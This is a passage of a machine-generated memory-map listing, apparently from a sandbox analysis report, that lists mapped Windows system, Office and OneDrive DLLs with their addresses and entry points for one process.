0x7fef6ac3fff monitored = 0 entry_point = 0x7fef6a566f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 643 start_va = 0x7fef82f0000 end_va = 0x7fef8308fff monitored = 0 entry_point = 0x7fef830077c region_type = mapped_file name = "wercplsupport.dll" filename = "\\Windows\\System32\\wercplsupport.dll" (normalized: "c:\\windows\\system32\\wercplsupport.dll") Region: id = 644 start_va = 0x7fef8310000 end_va = 0x7fef8352fff monitored = 0 entry_point = 0x7fef8331b50 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 645 start_va = 0x7fef8380000 end_va = 0x7fef83a1fff monitored = 0 entry_point = 0x7fef8381198 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 646 start_va = 0x7fef83b0000 end_va = 0x7fef84cefff monitored = 0 entry_point = 0x7fef83c339c region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 647 start_va = 0x7fef8580000 end_va = 0x7fef8588fff monitored = 0 entry_point = 0x7fef8582f98 region_type = mapped_file name = "midimap.dll" filename = "\\Windows\\System32\\midimap.dll" (normalized: "c:\\windows\\system32\\midimap.dll") Region: id = 648 start_va = 0x7fef8590000 end_va = 0x7fef85a7fff monitored = 0 entry_point = 0x7fef8591060 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\System32\\msacm32.dll" (normalized: "c:\\windows\\system32\\msacm32.dll") Region: id = 649 start_va = 0x7fef85b0000 end_va = 0x7fef85b9fff monitored = 0 entry_point = 0x7fef85b49f0 region_type = mapped_file name = "msacm32.drv" filename = "\\Windows\\System32\\msacm32.drv" (normalized: "c:\\windows\\system32\\msacm32.drv") Region: id = 650 start_va = 0x7fef85d0000 end_va = 0x7fef861efff monitored = 0 entry_point = 0x7fef85d2760 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 651 start_va = 0x7fef8620000 end_va = 0x7fef865afff monitored = 0 entry_point = 0x7fef8647600 region_type = mapped_file name = "wdmaud.drv" filename = "\\Windows\\System32\\wdmaud.drv" (normalized: "c:\\windows\\system32\\wdmaud.drv") Region: id = 652 start_va = 0x7fef8660000 end_va = 0x7fef869afff monitored = 0 entry_point = 0x7fef86622f0 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 653 start_va = 0x7fef86a0000 end_va = 0x7fef883bfff monitored = 0 entry_point = 0x7fef86a1030 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\System32\\networkexplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll") Region: id = 654 start_va = 0x7fef8840000 end_va = 0x7fef885bfff monitored = 0 entry_point = 0x7fef8841198 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 655 start_va = 0x7fef8860000 end_va = 0x7fef88defff monitored = 0 entry_point = 0x7fef88b385c region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 656 start_va = 0x7fef88e0000 end_va = 0x7fef891afff monitored = 0 entry_point = 0x7fef88e1070 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 657 start_va = 0x7fef8920000 end_va = 0x7fef892afff monitored = 0 entry_point = 0x7fef8921030 region_type = mapped_file name = "ehsso.dll" filename = "\\Windows\\ehome\\ehSSO.dll" (normalized: "c:\\windows\\ehome\\ehsso.dll") Region: id = 658 start_va = 0x7fef8930000 end_va = 0x7fef89e9fff monitored = 0 entry_point = 0x7fef893115c region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 659 start_va = 0x7fef89f0000 end_va = 0x7fef8a6bfff monitored = 0 entry_point = 0x7fef89f11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 660 start_va = 0x7fef8a70000 end_va = 0x7fef8d12fff monitored = 0 entry_point = 0x7fef8a73498 region_type = mapped_file name = "gameux.dll" filename = "\\Windows\\System32\\gameux.dll" (normalized: "c:\\windows\\system32\\gameux.dll") Region: id = 661 start_va = 0x7fef8da0000 end_va = 0x7fef8dabfff monitored = 0 entry_point = 0x7fef8da1380 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 662 start_va = 0x7fef8db0000 end_va = 0x7fef8de3fff monitored = 0 entry_point = 0x7fef8db1890 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 663 start_va = 0x7fef8df0000 end_va = 0x7fef8eddfff monitored = 0 entry_point = 0x7fef8df12a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 664 start_va = 0x7fef9100000 end_va = 0x7fef9117fff monitored = 0 entry_point = 0x7fef9101bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 665 start_va = 0x7fef9120000 end_va = 0x7fef9130fff monitored = 0 entry_point = 0x7fef91216ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 666 start_va = 0x7fef95e0000 end_va = 0x7fef9662fff monitored = 0 entry_point = 0x7fef960692c region_type = mapped_file name = "timedate.cpl" filename = "\\Windows\\System32\\timedate.cpl" (normalized: "c:\\windows\\system32\\timedate.cpl") Region: id = 667 start_va = 0x7fef9670000 end_va = 0x7fef967afff monitored = 0 entry_point = 0x7fef9675740 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 668 start_va = 0x7fef9880000 end_va = 0x7fef98a7fff monitored = 0 entry_point = 0x7fef9893cc4 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 669 start_va = 0x7fef9920000 end_va = 0x7fef9929fff monitored = 0 entry_point = 0x7fef9924938 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 670 start_va = 0x7fef9930000 end_va = 0x7fef9939fff monitored = 0 entry_point = 0x7fef9931198 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 671 start_va = 0x7fef9950000 end_va = 0x7fef9957fff monitored = 0 entry_point = 0x7fef9951030 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 672 start_va = 0x7fef9960000 end_va = 0x7fef99dffff monitored = 0 entry_point = 0x7fef9964a8c region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 673 start_va = 0x7fef99e0000 end_va = 0x7fef99eefff monitored = 0 entry_point = 0x7fef99e1040 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 674 start_va = 0x7fef99f0000 end_va = 0x7fef99fbfff monitored = 0 entry_point = 0x7fef99f1070 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 675 start_va = 0x7fef9a00000 end_va = 0x7fef9a7dfff monitored = 0 entry_point = 0x7fef9a01304 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 676 start_va = 0x7fef9a80000 end_va = 0x7fef9ab4fff monitored = 0 entry_point = 0x7fef9a8c59c region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 677 start_va = 0x7fef9ac0000 end_va = 0x7fefa33dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\1033\\grooveintlresource.dll") Region: id = 678 start_va = 0x7fefa340000 end_va = 0x7fefa4f8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 679 start_va = 0x7fefa500000 end_va = 0x7fefa815fff monitored = 0 entry_point = 0x7fefa503e98 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 680 start_va = 0x7fefa820000 end_va = 0x7fefa822fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 681 start_va = 0x7fefa830000 end_va = 0x7fefa832fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 682 start_va = 0x7fefa840000 end_va = 0x7fefa842fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 683 start_va = 0x7fefa850000 end_va = 0x7fefa852fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 684 start_va = 0x7fefa860000 end_va = 0x7fefa864fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 685 start_va = 0x7fefa870000 end_va = 0x7fefa874fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 686 start_va = 0x7fefa880000 end_va = 0x7fefa882fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 687 start_va = 0x7fefa890000 end_va = 0x7fefa92dfff monitored = 0 entry_point = 0x7fefa8d9d40 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\msvcp140.dll") Region: id = 688 start_va = 0x7fefa930000 end_va = 0x7fefa933fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 689 start_va = 0x7fefa940000 end_va = 0x7fefa943fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 690 start_va = 0x7fefa950000 end_va = 0x7fefa952fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 691 start_va = 0x7fefa960000 end_va = 0x7fefa963fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 692 start_va = 0x7fefa970000 end_va = 0x7fefa972fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll") Region: id = 693 start_va = 0x7fefa980000 end_va = 0x7fefa982fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 694 start_va = 0x7fefa990000 end_va = 0x7fefa992fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 695 start_va = 0x7fefa9a0000 end_va = 0x7fefa9a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 696 start_va = 0x7fefa9b0000 end_va = 0x7fefa9b2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll") Region: id = 697 start_va = 0x7fefa9c0000 end_va = 0x7fefa9c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 698 start_va = 0x7fefa9d0000 end_va = 0x7fefaac1fff monitored = 0 entry_point = 0x7fefa9d9060 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 699 start_va = 0x7fefaad0000 end_va = 0x7fefaad3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 700 start_va = 0x7fefaae0000 end_va = 0x7fefaaf6fff monitored = 0 entry_point = 0x7fefaaec440 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\vcruntime140.dll") Region: id = 701 start_va = 0x7fefab00000 end_va = 0x7fefad13fff monitored = 0 entry_point = 0x7fefab01000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\grooveex.dll") Region: id = 702 start_va = 0x7fefad20000 end_va = 0x7fefadedfff monitored = 0 entry_point = 0x7fefad430fc region_type = mapped_file name = "msvcr110.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcr110.dll") Region: id = 703 start_va = 0x7fefadf0000 end_va = 0x7fefae96fff monitored = 0 entry_point = 0x7fefae3b93c region_type = mapped_file name = "msvcp110.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcp110.dll") Region: id = 704 start_va = 0x7fefaea0000 end_va = 0x7fefaef5fff monitored = 0 entry_point = 0x7fefaea86e8 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\filesyncshell64.dll") Region: id = 705 start_va = 0x7fefaf00000 end_va = 0x7fefaf56fff monitored = 0 entry_point = 0x7fefaf01118 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 706 start_va = 0x7fefaf60000 end_va = 0x7fefb129fff monitored = 0 entry_point = 0x7fefaf67a60 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 707 start_va = 0x7fefb130000 end_va = 0x7fefb147fff monitored = 0 entry_point = 0x7fefb131010 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 708 start_va = 0x7fefb150000 end_va = 0x7fefb165fff monitored = 0 entry_point = 0x7fefb151050 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 709 start_va = 0x7fefb170000 end_va = 0x7fefb1b2fff monitored = 0 entry_point = 0x7fefb1730d8 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 710 start_va = 0x7fefb230000 end_va = 0x7fefb23afff monitored = 0 entry_point = 0x7fefb231198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 711 start_va = 0x7fefb240000 end_va = 0x7fefb266fff monitored = 0 entry_point = 0x7fefb2498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 712 start_va = 0x7fefb270000 end_va = 0x7fefb2d6fff monitored = 0 entry_point = 0x7fefb286060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 713 start_va = 0x7fefb2f0000 end_va = 0x7fefb2fafff monitored = 0 entry_point = 0x7fefb2f4f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 714 start_va = 0x7fefb320000 end_va = 0x7fefb338fff monitored = 0 entry_point = 0x7fefb3211a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 715 start_va = 0x7fefb3c0000 end_va = 0x7fefb3d4fff monitored = 0 entry_point = 0x7fefb3c60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 716 start_va = 0x7fefb4b0000 end_va = 0x7fefb5d6fff monitored = 0 entry_point = 0x7fefb4b10ec region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 717 start_va = 0x7fefb6c0000 end_va = 0x7fefb6d2fff monitored = 0 entry_point = 0x7fefb6ca8b8 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 718 start_va = 0x7fefb6e0000 end_va = 0x7fefb6e8fff monitored = 0 entry_point = 0x7fefb6e1010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 719 start_va = 0x7fefb6f0000 end_va = 0x7fefb71bfff monitored = 0 entry_point = 0x7fefb6f15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 720 start_va = 0x7fefb920000 end_va = 0x7fefb933fff monitored = 0 entry_point = 0x7fefb9216b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 721 start_va = 0x7fefb940000 end_va = 0x7fefb954fff monitored = 0 entry_point = 0x7fefb941050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 722 start_va = 0x7fefb960000 end_va = 0x7fefb96bfff monitored = 0 entry_point = 0x7fefb9618a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 723 start_va = 0x7fefbaa0000 end_va = 0x7fefbab0fff monitored = 0 entry_point = 0x7fefbaa1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 724 start_va = 0x7fefbad0000 end_va = 0x7fefbbf9fff monitored = 0 entry_point = 0x7fefbad3810 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 725 start_va = 0x7fefbc00000 end_va = 0x7fefbc34fff monitored = 0 entry_point = 0x7fefbc01064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 726 start_va = 0x7fefbc40000 end_va = 0x7fefbc57fff monitored = 0 entry_point = 0x7fefbc41130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 727 start_va = 0x7fefbc60000 end_va = 0x7fefbcaafff monitored = 0 entry_point = 0x7fefbc6efcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 728 start_va = 0x7fefbcb0000 end_va = 0x7fefbcbafff monitored = 0 entry_point = 0x7fefbcb1020 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 729 start_va = 0x7fefbcc0000 end_va = 0x7fefbcfafff monitored = 0 entry_point = 0x7fefbccf410 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 730 start_va = 0x7fefbd00000 end_va = 0x7fefbd42fff monitored = 0 entry_point = 0x7fefbd0c168 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 731 start_va = 0x7fefbd50000 end_va = 0x7fefbe41fff monitored = 0 entry_point = 0x7fefbd7ac20 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 732 start_va = 0x7fefbe50000 end_va = 0x7fefc064fff monitored = 0 entry_point = 0x7fefc0264b0 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 733 start_va = 0x7fefc070000 end_va = 0x7fefc0c5fff monitored = 0 entry_point = 0x7fefc07bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 734 start_va = 0x7fefc0d0000 end_va = 0x7fefc1fbfff monitored = 0 entry_point = 0x7fefc0d94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 735 start_va = 0x7fefc200000 end_va = 0x7fefc21cfff monitored = 0 entry_point = 0x7fefc201ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 736 start_va = 0x7fefc220000 end_va = 0x7fefc243fff monitored = 0 entry_point = 0x7fefc221024 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 737 start_va = 0x7fefc250000 end_va = 0x7fefc443fff monitored = 0 entry_point = 0x7fefc3dc924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: 